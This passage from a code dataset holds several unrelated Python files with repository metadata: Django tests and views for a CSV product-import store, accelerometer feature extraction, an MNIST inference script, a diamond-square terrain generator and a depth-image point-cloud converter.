resultado = self.mock_arquivo.pega_dataframe()\n\n assert resultado == 'Arquivo invalido'\n assert mock_funcao.validar_arquivo_extensao.called\n \n @patch('pandas.read_csv')\n def test_pega_dataframe_estensao_valido_com_colunas_faltando_retornando_str(self,read_csv_mock):\n read_csv_mock.side_effect = ValueError()\n mock_funcao = self.mock_arquivo\n mock_funcao.validar_arquivo_extensao = Mock(return_value=True)\n \n resultado = self.mock_arquivo.pega_dataframe() \n\n assert isinstance(resultado, str)\n assert mock_funcao.validar_arquivo_extensao.called\n \n def test_validar_arquivo_extensao_valido_retornar_true(self):\n resultado = self.mock_arquivo.validar_arquivo_extensao()\n assert resultado == True\n \n def test_validar_arquivo_extensao_invalido_retornar_false(self):\n mock_arquivo = MagicMock()\n mock_arquivo.name = 'valid.txt'\n \n entrada = ImportFromCsv(mock_arquivo)\n resultado = entrada.validar_arquivo_extensao() \n \n assert resultado == False\n\n @pytest.mark.parametrize('dados',[\n ['apple', 's9', 'azul', 'pos', '450', '55.0']\n ])\n def test_validar_dados_necessario_arquivo_tipo_dataframe_valido_retornar_true_e_adicionando_dataframe(self,dados,columns_csv):\n mock_funcao = self.mock_arquivo\n mock_funcao.pega_dataframe = Mock(return_value=(pd.DataFrame([dados], columns=columns_csv)))\n \n resultado = self.mock_arquivo.validar_dados_necessario()\n\n assert resultado == True\n assert isinstance(self.mock_arquivo.dataframe,pd.DataFrame)\n assert mock_funcao.pega_dataframe.called\n\n def test_validar_dados_necessario_arquivo_invalido_retornar_false_e_adicionando_msg_error(self):\n mock_funcao = self.mock_arquivo\n mock_funcao.pega_dataframe = Mock(return_value=False)\n \n resultado = self.mock_arquivo.validar_dados_necessario()\n\n assert resultado == False\n assert len(self.mock_arquivo.error) == 1 \n assert mock_funcao.pega_dataframe.called\n\n @pytest.mark.parametrize('dados',[\n ['apple', 's9', 'azul', 'pos', 'a450', '55.0']])\n def test_validar_dados_necessario_contem_erros_retornando_false(self,dados,columns_csv):\n mock_funcao = self.mock_arquivo\n mock_funcao.pega_dataframe = Mock(return_value=pd.DataFrame([dados],columns=columns_csv))\n\n resultado = self.mock_arquivo.validar_dados_necessario()\n\n assert resultado == False\n assert len(self.mock_arquivo.error) == 2\n\n @pytest.mark.parametrize('dados',[\n ['apple', 's9', 'azul', 'pos', 'a450', '55.0']])\n def test_save_dataframe_nao_e_none_retornar_true(self,dados,columns_csv):\n dataframe = pd.DataFrame([dados],columns=columns_csv)\n mock_parametro = self.mock_arquivo\n mock_parametro.dataframe = MagicMock(return_value=dataframe)\n \n resultado = self.mock_arquivo.save()\n\n assert resultado == True\n \n def test_save_dataframe_e_none_retornar_false(self):\n resultado = self.mock_arquivo.save()\n\n assert resultado == False\n\n def test_save_fabricante_get_or_create_retorna_2_objetos_criado_e_com_a_dado_ja_criado_e_outra_com_samsung(self,mock_dados,fabricante_factory):\n fabricante = fabricante_factory.create()\n mock_parametro = self.mock_arquivo\n mock_parametro.dataframe = pd.DataFrame(data=mock_dados)\n\n self.mock_arquivo.save()\n\n assert len(Fabricante.objects.all()) == 2 \n assert Fabricante.objects.get(id=1) == fabricante\n assert Fabricante.objects.get(id=2).fabricante == 'Samsung'\n\n def test_save_produtos_filter_encontrado_retornando_so_2_banco_de_dados_e_alterando_price_e_quantidade(self,mock_dados,produto_factory):\n produto = produto_factory.create()\n\n mock_parametro = self.mock_arquivo\n mock_parametro.dataframe = pd.DataFrame(data=mock_dados)\n self.mock_arquivo.save()\n \n entrada = Produtos.objects.get(id=1)\n \n assert len(Produtos.objects.all()) == 2\n assert entrada == produto\n assert entrada.price == 1000\n assert entrada.quantity == 4\n ", "repo_name": "Duarts-D/loja-importacao_csv", "sub_path": "apps/importacaocsv/tests/test_import_csv.py", "file_name": "test_import_csv.py", "file_ext": "py", "file_size_in_byte": 6499, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest.fixture", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 19, "usage_type": "attribute"}, {"api_name": "unittest.mock.MagicMock", "line_number": 28, "usage_type": "call"}, {"api_name": "apps.importacaocsv.import_csv.ImportFromCsv", "line_number": 30, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 34, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 43, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 52, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 55, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 59, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 50, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 64, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 75, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 71, "usage_type": "call"}, {"api_name": "unittest.mock.MagicMock", "line_number": 87, "usage_type": "call"}, {"api_name": "apps.importacaocsv.import_csv.ImportFromCsv", "line_number": 90, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 95, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 95, "usage_type": "attribute"}, {"api_name": "unittest.mock.Mock", "line_number": 110, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 122, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 122, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 118, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 132, "usage_type": "call"}, {"api_name": "unittest.mock.MagicMock", "line_number": 134, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 129, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 129, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 148, "usage_type": "call"}, {"api_name": "apps.loja.models.Fabricante.objects.all", "line_number": 152, "usage_type": "call"}, {"api_name": "apps.loja.models.Fabricante.objects", "line_number": 152, "usage_type": "attribute"}, {"api_name": "apps.loja.models.Fabricante", "line_number": 152, "usage_type": "name"}, {"api_name": "apps.loja.models.Fabricante.objects.get", "line_number": 153, "usage_type": "call"}, {"api_name": "apps.loja.models.Fabricante.objects", "line_number": 153, "usage_type": "attribute"}, {"api_name": "apps.loja.models.Fabricante", "line_number": 153, "usage_type": "name"}, {"api_name": "apps.loja.models.Fabricante.objects.get", "line_number": 154, "usage_type": "call"}, {"api_name": "apps.loja.models.Fabricante.objects", "line_number": 154, "usage_type": "attribute"}, {"api_name": "apps.loja.models.Fabricante", "line_number": 154, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 160, "usage_type": "call"}, {"api_name": "apps.loja.models.Produtos.objects.get", "line_number": 163, "usage_type": "call"}, {"api_name": "apps.loja.models.Produtos.objects", "line_number": 163, "usage_type": "attribute"}, {"api_name": "apps.loja.models.Produtos", "line_number": 163, "usage_type": "name"}, {"api_name": "apps.loja.models.Produtos.objects.all", "line_number": 165, "usage_type": "call"}, {"api_name": "apps.loja.models.Produtos.objects", "line_number": 165, "usage_type": "attribute"}, {"api_name": "apps.loja.models.Produtos", "line_number": 165, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 25, "usage_type": "attribute"}]}
+{"seq_id": "43151149391", "text": "import pandas as pd\nimport numpy as np \nfrom scipy import stats\nfrom scipy.signal import find_peaks\n\ndef features_extract (df, accx, accy, accz, activity, window_size, step_size): \n # features based on accx, accy, accz\n x_list = []\n y_list = []\n z_list = []\n labels = []\n\n # overlapping windows\n for i in range(0, len(df) - window_size + 1, step_size):\n # arrays per axis\n xs = df[accx].values[i: i + window_size]\n ys = df[accy].values[i: i + window_size]\n zs = df[accz].values[i: i + window_size]\n\n # label with most occurrences in window\n input_array = np.array(df[activity][i: i + window_size], dtype=float)\n label = stats.mode(input_array)[0]\n\n x_list.append(xs)\n y_list.append(ys)\n z_list.append(zs)\n labels.append(label)\n\n # converting the lists to series\n x_series_td = pd.Series(x_list)\n y_series_td = pd.Series(y_list)\n z_series_td = pd.Series(z_list)\n\n # converting the signals from time domain to frequency domain using FFT\n fft_size = int((window_size/2)) + 1\n\n x_series_fft = x_series_td.apply(lambda x: np.abs(np.fft.fft(x))[1:fft_size])\n y_series_fft = y_series_td.apply(lambda x: np.abs(np.fft.fft(x))[1:fft_size])\n z_series_fft = z_series_td.apply(lambda x: np.abs(np.fft.fft(x))[1:fft_size])\n\n X = pd.DataFrame()\n y = np.array(labels)\n y = y.astype(int)\n\n for tp in ['td', 'fft']:\n\n for axis in ['x','y','z']:\n \n series = locals()[f'{axis}_series_{tp}']\n\n ################## simple statistics features ##################\n # mean\n X[f'{axis}_mean_{tp}'] = series.apply(lambda x: x.mean())\n # mean abs diff\n X[f'{axis}_meandiff_{tp}'] = series.apply(lambda x: np.mean(np.absolute(x - np.mean(x))))\n # min\n X[f'{axis}_min_{tp}'] = series.apply(lambda x: x.min())\n # max\n X[f'{axis}_max_{tp}'] = series.apply(lambda x: x.max()) \n # max-min diff\n X[f'{axis}_minmax_{tp}'] = X[f'{axis}_max_{tp}'] - X[f'{axis}_min_{tp}']\n # median\n X[f'{axis}_median_{tp}'] = series.apply(lambda x: np.median(x))\n # median abs diff \n X[f'{axis}_mediandiff_{tp}'] = series.apply(lambda x: np.median(np.absolute(x - np.median(x))))\n # std dev\n X[f'{axis}_std_{tp}'] = series.apply(lambda x: x.std())\n # interquartile range\n X[f'{axis}_quart_{tp}'] = series.apply(lambda x: np.percentile(x, 75) - np.percentile(x, 25))\n\n # indexes\n # index of min value in window\n if tp == 'td':\n X[f'{axis}_argmin_{tp}'] = series.apply(lambda x: np.argmin(x))\n # index of max value in window\n X[f'{axis}_argmax_{tp}'] = series.apply(lambda x: np.argmax(x))\n else:\n X[f'{axis}_argmin_{tp}'] = series.apply(lambda x: np.argmin(np.abs(np.fft.fft(x))[1:fft_size]))\n # index of max value in window\n X[f'{axis}_argmax_{tp}'] = series.apply(lambda x: np.argmax(np.abs(np.fft.fft(x))[1:fft_size]))\n \n # abs max-min index diff\n X[f'{axis}_minmaxarg_{tp}'] = abs(X[f'{axis}_argmax_{tp}'] - X[f'{axis}_argmin_{tp}'])\n \n # only for time domain\n if tp == 'td': \n # negtive values count\n X[f'{axis}_negatives_{tp}'] = series.apply(lambda x: np.sum(x < 0))\n # positive values count\n X[f'{axis}_positives_{tp}'] = series.apply(lambda x: np.sum(x > 0))\n \n # values above mean\n X[f'{axis}_meanabove_{tp}'] = series.apply(lambda x: np.sum(x > x.mean()))\n # skewness\n X[f'{axis}_skewness_{tp}'] = series.apply(lambda x: stats.skew(x))\n # kurtosis\n X[f'{axis}_kurtosis_{tp}'] = series.apply(lambda x: stats.kurtosis(x))\n\n\n ################## signal based features ##################\n # count peaks in signal\n X[f'{axis}_peaks_{tp}'] = series.apply(lambda x: len(find_peaks(x)[0]))\n # power of signal: average of the squared signal\n X[f'{axis}_power_{tp}'] = series.apply(lambda x: np.mean(x**2))\n \n # over all axis\n seriesx = locals()[f'x_series_{tp}']\n seriesy = locals()[f'y_series_{tp}']\n seriesz = locals()[f'z_series_{tp}']\n\n # signal magnitude area\n X[f'SMA_{tp}'] = seriesx.apply(lambda x: np.mean(abs(x))) + seriesy.apply(lambda x: np.mean(abs(x))) + seriesz.apply(lambda x: np.mean(abs(x)))\n\n # avg resultant\n X[f'avg_result_accl_{tp}'] = [i.mean() for i in ((seriesx**2 + seriesy**2 + seriesz**2)**0.5)]\n\n return X, y", "repo_name": "ylekka/thesisYL", "sub_path": "AR_features_extract.py", "file_name": "AR_features_extract.py", "file_ext": "py", "file_size_in_byte": 4834, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "scipy.stats.mode", "line_number": 22, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 22, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 80, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 93, "usage_type": "call"}, {"api_name": "scipy.stats.skew", "line_number": 95, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 95, "usage_type": "name"}, {"api_name": "scipy.stats.kurtosis", "line_number": 97, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 97, "usage_type": "name"}, {"api_name": "scipy.signal.find_peaks", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 112, "usage_type": "call"}]}
+{"seq_id": "36186750258", "text": "# coding: utf-8\nimport sys, os\nsys.path.append(os.pardir) # 부모 디렉터리의 파일을 가져올 수 있도록 설정\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom dataset.mnist import load_mnist\nfrom simple_convnet import SimpleConvNet\nfrom common.trainer import Trainer\n\n# 데이터 읽기\n(x_train, t_train), (x_test, t_test) = load_mnist(flatten=False)\n\n# 시간이 오래 걸릴 경우 데이터를 줄인다.\n#x_train, t_train = x_train[:5000], t_train[:5000]\n#x_test, t_test = x_test[:1000], t_test[:1000]\n\nmax_epochs = 20\n\nnetwork = SimpleConvNet(input_dim=(1,28,28), \n conv_param = {'filter_num': 30, 'filter_size': 5, 'pad': 0, 'stride': 1},\n hidden_size=100, output_size=10, weight_init_std=0.01)\n\n# 파라미터 저장\npath_dir = './ckpt'\nfile_name = \"simple_convnet_params.pkl\"\nif not os.path.isdir(path_dir):\n os.mkdir(path_dir)\n\nprint(\"Load Network Parameters!\")\nnetwork.load_params(os.path.join(path_dir, file_name))\n\ntest_acc = network.accuracy(x_test, t_test)\nprint(\"test acc | \", format(test_acc*100, \".2f\"), '%')\n", "repo_name": "idsdlab/basicai_fa23", "sub_path": "week13_lab/mnist/inference_simple_convnet_mnist.py", "file_name": "inference_simple_convnet_mnist.py", "file_ext": "py", "file_size_in_byte": 1099, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "os.pardir", "line_number": 3, "usage_type": "attribute"}, {"api_name": "dataset.mnist.load_mnist", "line_number": 11, "usage_type": "call"}, {"api_name": "simple_convnet.SimpleConvNet", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}]}
+{"seq_id": "35448366707", "text": "#!/usr/bin/python3\n\nimport argparse\nimport math\nimport random\n\nimport numpy\nfrom PIL import Image\n\ndef scaled_random(mag):\n return (2 * random.random() - 1.0) * mag\n\ndef diamond(array, x, y, size, mag):\n \"\"\"For each square in the array, set the midpoint of that square to be the\n average of the four corner points plus a random value.\n \"\"\"\n half = size // 2\n\n x1 = x + size\n y1 = y + size\n\n a = array[x, y]\n b = array[x1, y]\n c = array[x1, y1]\n d = array[x, y1]\n\n array[x + half, y + half] = (a + b + c + d) / 4.0 + scaled_random(mag)\n\ndef square(array, x, y, size, mag):\n \"\"\"For each diamond in the array, set the midpoint of that diamond to be\n the average of the four corner points plus a random value. \"\"\"\n\n x1 = x - size\n y1 = y - size\n x2 = x + size\n y2 = y + size\n\n div = 4.0\n\n l = len(array)\n\n if x1 >= 0:\n a = array[x1, y]\n else:\n a = 0.0\n div -= 1.0\n if y1 >= 0:\n b = array[x, y1]\n else:\n b = 0.0\n div -= 1.0\n if x2 < l:\n c = array[x2, y]\n else:\n c = 0.0\n div -= 1.0\n if y2 < l:\n d = array[x, y2]\n else:\n d = 0.0\n div -= 1.0\n\n if div:\n array[x, y] = (a + b + c + d) / div + scaled_random(mag)\n\ndef diamond_square(array, step, mag, red):\n if step < 2:\n return\n\n l = len(array) - 1\n half = step // 2\n\n for x in range(0, l, step):\n for y in range(0, l, step):\n diamond(array, x, y, step, mag)\n\n for x in range(0, l + 1, step):\n for y in range(0, l + 1, step):\n if x < l:\n square(array, x + half, y, half, mag)\n if y < l:\n square(array, x, y + half, half, mag)\n\n mag *= red\n\n diamond_square(array, half, mag, red)\n\ndef main():\n parser = argparse.ArgumentParser(\"Diamond-square terrain generator\")\n parser.add_argument(\"--seed\", type=int, default=None,\n help=\"Random seed\")\n parser.add_argument(\"--size\", type=int, default=256,\n help=\"Image size (rounded up to power of 2)\")\n parser.add_argument(\"filename\", nargs=1,\n help=\"Target file name\")\n args = parser.parse_args()\n\n if args.size < 2:\n args.size = 2\n else:\n args.size = 2 ** int(math.log2(args.size - 1) + 1)\n\n if args.seed:\n random.seed(args.seed)\n else:\n random.seed()\n\n array = numpy.zeros((args.size + 1, args.size + 1), dtype=numpy.float32)\n\n array[0,0] = scaled_random(2)\n array[0,args.size] = scaled_random(2)\n array[args.size,0] = scaled_random(2)\n array[args.size,args.size] = scaled_random(2)\n\n diamond_square(array, args.size, 1.0, 0.5)\n\n minimum = numpy.amin(array)\n maximum = numpy.amax(array)\n\n array -= minimum\n maximum -= minimum\n\n array = array * (255.0 / maximum)\n\n barray = numpy.array(array, dtype=numpy.ubyte)\n\n im = Image.frombuffer(\"L\", (args.size + 1, args.size + 1),\n memoryview(barray), \"raw\", \"L\", 0, 1)\n im = im.crop((0, 0, args.size, args.size))\n\n px = im.load()\n\n im.save(args.filename[0])\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "Jajcus/vulkanplay", "sub_path": "utils/diamond_square.py", "file_name": "diamond_square.py", "file_ext": "py", "file_size_in_byte": 3199, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.random", "line_number": 11, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 89, "usage_type": "call"}, {"api_name": "math.log2", "line_number": 101, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 104, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 108, "usage_type": "attribute"}, {"api_name": "numpy.amin", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.ubyte", "line_number": 125, "usage_type": "attribute"}, {"api_name": "PIL.Image.frombuffer", "line_number": 127, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 127, "usage_type": "name"}]}
+{"seq_id": "32395300060", "text": "# TODO:给定图像的关键点坐标,根据深度相机得到三���空间坐标\n# 目的是为了模型注册\n\n# 输入: 图片\n# 输出: 3d点\n# 规定图像尺度为像素\n# 实际坐标的尺度为mm\n\nimport pyrealsense2 as rs\nfrom numpy import *\nimport numpy as np\n\nimport open3d as o3d\nimport cv2\n\nimport os\nimport time\nfrom enum import IntEnum\n\nfrom o3d_pose_lib import *\n\nnp.set_printoptions(suppress=True)\n\n\n# 这个是将整个深度图转为点云\ndef get_cloud_xyz(depth, scale, u0, v0, fx, fy):\n global xmap, ymap\n zmap = depth.flatten()\n\n print('xmap:', xmap.shape)\n print('ymap:', ymap.shape)\n print('zmap:', zmap.shape)\n\n # Z = zmap * scale\n Z = zmap\n X = (xmap - v0) * Z / fx\n Y = (ymap - u0) * Z / fy\n\n X = X[:, newaxis].astype(np.float32)\n Y = Y[:, newaxis].astype(np.float32)\n Z = Z[:, newaxis].astype(np.float32)\n\n cloud = np.concatenate((X, Y, Z), axis=1)\n\n return cloud\n\n\n# 添加颜色 问题:有一点对齐误差\ndef get_cloud_xyzrgb(depth, color, scale, u0, v0, fx, fy):\n global xmap, ymap\n\n # zmap = depth.flatten()\n zmap = depth.reshape(-1)\n # Z = zmap * scale # 乘 就变成了m为单位\n Z = zmap\n Y = (xmap - v0) * Z / fy # 因为检索时xy实际上是y行x列\n X = (ymap - u0) * Z / fx\n\n X = X[:, newaxis].astype(np.float32) # 可以优化\n Y = Y[:, newaxis].astype(np.float32)\n Z = Z[:, newaxis].astype(np.float32)\n cloud = np.concatenate((X, Y, Z), axis=1) # 拼接坐标\n\n # colors\n rgbs = color.reshape(-1, 3)\n\n return cloud, rgbs / 255\n\n\n# 将单个xyZ转为XYZ 图像坐标-》相机坐标\ndef get_xyz(pix, Z, u0, v0, fx, fy): # (x,y)\n Y = (pix[0] - v0) / fy * Z\n X = (pix[1] - u0) / fx * Z\n pt_w = np.array([X, Y, Z])\n return pt_w\n\n\nif __name__ == \"__main__\":\n\n # 参数设置\n\n # 画幅\n # width = 1280\n # height = 720\n\n width = 512\n height = 424\n\n # 最简单的测试:给定一个xyz,得到XYZ\n # 像素坐标映射\n xmap, ymap = mgrid[0:height, 0:width] # 前面是行范围 后面是列范围 对应到图像坐标,则xmap是y范围\n xmap, ymap = xmap.flatten(), ymap.flatten()\n\n # Getting the depth sensor's depth scale (see rs-align example for explanation)\n depth_scale = 0.001\n print('depth_scale:', depth_scale)\n\n # We will not display the background of objects more than\n # clipping_distance_in_meters meters away\n clipping_distance_in_meters = 3 # 阈值 meter\n clipping_distance = clipping_distance_in_meters / depth_scale\n\n # Create an align object\n # align_to = rs.stream.color # 将depth对齐到color\n # align = rs.align(align_to)\n\n # 内参 ----------------------\n # intrinsic = get_intrinsic_matrix(color_frame)\n # print(intrinsic)\n # u0, v0 = intrinsic.ppx, intrinsic.ppy\n # fx, fy = intrinsic.fx, intrinsic.fy\n u0, v0 = width / 2, height / 2\n fx, fy = 0.001, 0.001\n\n dist_coeffs = zeros((4, 1)) # Assuming no lens distortion\n\n # 保存内参\n # intrinsic_mat = np.array([[fx, 0, u0],\n # [0, fy, v0],\n # [0, 0, 1]])\n\n # OPEN3D begain ---------------------\n vis = o3d.visualization.Visualizer()\n vis.create_window(window_name='ANTenna3D')\n\n # 设置窗口背景颜色\n opt = vis.get_render_option()\n opt.background_color = np.asarray([0, 0., 0.0]) # up to 1\n # print(dir(opt))\n\n pcd = o3d.geometry.PointCloud()\n flip_transform = [[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]]\n\n coord = o3d.geometry.TriangleMesh.create_coordinate_frame(origin=[0, 0, 0], size=0.1) # 坐标系\n coord.transform(flip_transform)\n # OPEN3D end\n\n # Streaming loop\n frame_count = 0\n\n # while True:\n for frame_idx in range(1):\n\n s_time = time.time()\n\n frame_path = 'D:/SIA/Dataset/Kinect2/depth/1.bmp'\n\n # Align the depth frame to color frame\n # aligned_frames = align.process(frames)\n\n # 对齐 rgbd\n # 加载\n depth_img = cv2.imread(frame_path, 0)\n print(depth_img)\n print(shape(depth_img))\n\n # 整个点云\n pts = get_cloud_xyz(depth_img, depth_scale, u0, v0, fx, fy)\n # pts, color = get_cloud_xyzrgb(depth_img, rgb_img, depth_scale, u0, v0, fx, fy)\n # print(pts.shape)\n\n # # 使用open3d 查看效果\n pcd.points = o3d.utility.Vector3dVector(pts) # 效率极低! 30FPS -》 2.7FPS。。。\n # pcd.colors = o3d.utility.Vector3dVector(color)\n\n # show_pcd(pcd)\n\n # 写文件\n o3d.io.write_point_cloud(str(frame_count) + '.ply', pcd)\n\n pcd.transform(flip_transform)\n\n if frame_count == 0:\n vis.add_geometry(pcd)\n vis.add_geometry(coord)\n\n vis.update_geometry(pcd)\n vis.poll_events()\n vis.update_renderer()\n\n frame_count += 1\n\n delta_time = time.time() - s_time\n print('FPS:', 1/delta_time)\n", "repo_name": "antenna-fast/PoseEstimation", "sub_path": "dataset/real_camera/depth_to_pcd.py", "file_name": "depth_to_pcd.py", "file_ext": "py", "file_size_in_byte": 4976, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.set_printoptions", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 74, "usage_type": "call"}, {"api_name": "open3d.visualization.Visualizer", "line_number": 123, "usage_type": "call"}, {"api_name": "open3d.visualization", "line_number": 123, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 128, "usage_type": "call"}, {"api_name": "open3d.geometry.PointCloud", "line_number": 131, "usage_type": "call"}, {"api_name": "open3d.geometry", "line_number": 131, "usage_type": "attribute"}, {"api_name": "open3d.geometry.TriangleMesh.create_coordinate_frame", "line_number": 134, "usage_type": "call"}, {"api_name": "open3d.geometry", "line_number": 134, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 144, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 153, "usage_type": "call"}, {"api_name": "open3d.utility.Vector3dVector", "line_number": 163, "usage_type": "call"}, {"api_name": "open3d.utility", "line_number": 163, "usage_type": "attribute"}, {"api_name": "open3d.io.write_point_cloud", "line_number": 169, "usage_type": "call"}, {"api_name": "open3d.io", "line_number": 169, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 183, "usage_type": "call"}]}
+{"seq_id": "32477861647", "text": "from django.contrib.auth.models import User as auth_user\nfrom django.http import JsonResponse\nimport json\nfrom random import randint\n\nfrom .models import *\n\n# Create your views here.\n\ndef get_session_obj(token):\n return Session.objects.filter(token = token).first()\n\ndef check_session(session):\n return (session is None) or (not session.status)\n\ndef create_new_user(request):\n if request.method == 'POST':\n payload = json.loads(request.body)\n user_name = payload['name']\n user_email = payload['email']\n user_password = payload['password']\n\n isUserExists = auth_user.objects.filter(email=user_email).first()\n if isUserExists:\n return JsonResponse({'status':'User Already Exists'})\n else:\n new_auth_user = auth_user.objects.create_user(username = user_name, email=user_email, password=user_password)\n if new_auth_user:\n new_user = User()\n new_user.to_db(payload)\n new_user.save()\n return JsonResponse({'status':'User Created Successfully'})\n else:\n return JsonResponse({'status':'Failed to Create New User'})\n \n else:\n return JsonResponse({'status':'Invalid Request Method, only POST Method is Allowed'})\n\ndef update_user(request):\n if request.method == 'POST':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n payload = json.loads(request.body)\n user_obj = User.objects.filter(id = session_obj.user.id).first()\n user_obj.to_db(payload)\n user_obj.save()\n return JsonResponse({'status': 'User Details Updated Successfully'})\n \n else:\n return JsonResponse({'status': 'Invalid Request Method, Only POST Method is Allowed'})\n\ndef delete_user(request):\n if request.method == 'POST':\n token = request.headers['token']\n session_obj = get_session_obj(token)\n if check_session(session_obj):\n return JsonResponse({'status': 'User not Logged in'})\n else:\n auth_obj = auth_user.objects.filter(email = session_obj.user.email)\n 